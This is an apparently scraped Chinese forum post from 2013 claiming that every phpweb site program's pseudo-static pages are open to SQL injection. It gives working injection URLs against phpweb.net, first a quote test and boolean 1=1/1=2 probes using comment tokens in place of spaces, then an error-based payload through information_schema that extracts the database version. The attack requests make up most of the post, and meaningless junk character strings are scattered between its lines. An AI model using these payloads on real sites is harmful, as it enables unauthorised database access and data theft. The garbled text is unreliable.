phpweb所有的整站程序伪静态页面都存在sql注入
4 r1 r; v! m$ d6 h- |, B. e5 k" i
: A& l* X. l" k5 N4 s3 `# M, p主站:http://phpweb.net/, N" Z1 q. G4 z; z
加’检测:
" M) S+ _& W" I% r3 ] # ?) I: W4 U5 U( c8 U. X& Z
http://www.phpweb.net/down/html/?772′.html
& u7 n" b E7 D6 f; l" o ' {$ Z0 s! b5 a- j3 }5 E7 D. f
出错" [& C" `. a( q1 @# M
存在注入。
2 E9 ?8 G0 s3 @$ D2 A) [不能用空格,只能用/*罗# A! ?: X e u5 x* j5 Q- s
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常& F {, t) k6 h3 G
. r7 C) h/ o3 C( f
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
2 A6 a' R( T L爆数据库版本:. Z# X* `+ B ]
' e* L9 [% ?6 _% B?
, X6 f2 V+ t; e' z6 X+ G% \1
" Q8 w. A% J" p3 b+ t. b5 @http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html, a+ e! n+ _4 C# C3 k" V( g
更新日期: 2013-01-03 13:39:50
+ W# z, m B; A/ G7 c% S; x |
发表于 2013-1-4 19:46:42
收藏
支持
反对